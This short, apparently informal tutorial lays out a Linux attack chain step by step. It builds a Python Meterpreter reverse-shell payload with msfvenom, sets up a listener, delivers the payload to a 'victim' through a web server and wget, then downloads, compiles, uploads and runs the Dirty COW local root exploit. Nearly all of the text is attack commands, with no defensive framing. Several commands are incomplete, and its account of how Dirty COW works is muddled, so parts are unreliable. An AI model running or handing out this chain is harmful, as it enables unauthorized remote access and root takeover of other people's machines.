Do this :-
1] msfvenom -p python/meterpreter/reverse_tcp -f raw \ --platform python -a python -e generic/none LHOST=someip LPORT=someport \ >'somedir/'
2] -p payload
-f fileformat
-e encoder
> raw output
3] Writing resource file
touch python_
Now copy and paste these commands
cat >>python_
use multi/handler
set payload python/meterpreter/reverse_tcp
set lhost
set lport 4444
set ExitOnSession false
exploit -j
4] msfconsole -q (quite) -x to (execute command exec)
loading resource file to start multi/handler
msfconsole -q -r python_
5] now move payload to webroot dir
mv /var/www/html/
sending payload to victim using wget
wget http://ip/
spawing python shell
Now local root privilege exploit dirtyc0w comes in picture
what is dirtyc0w ?
dirtyc0w is local root exploit
how does dirtyc0w work ?
dirtc0w backdoors /etc/passwd file to gain root access on target
and overwrites itself to kernels memory
6] before running any exploits recon is very important
so we verify -- / kernel info / os version / codename / --
uname --all
7] cat /etc/*release
download the exploit here
wget https://exploit-db/download/40616.c
now compiling the source
gcc 40616.c -o dirtyc0w -pthread
now upload the compiled binary to target
upload dirtyc0w [using meterpreter]
and execute the programm
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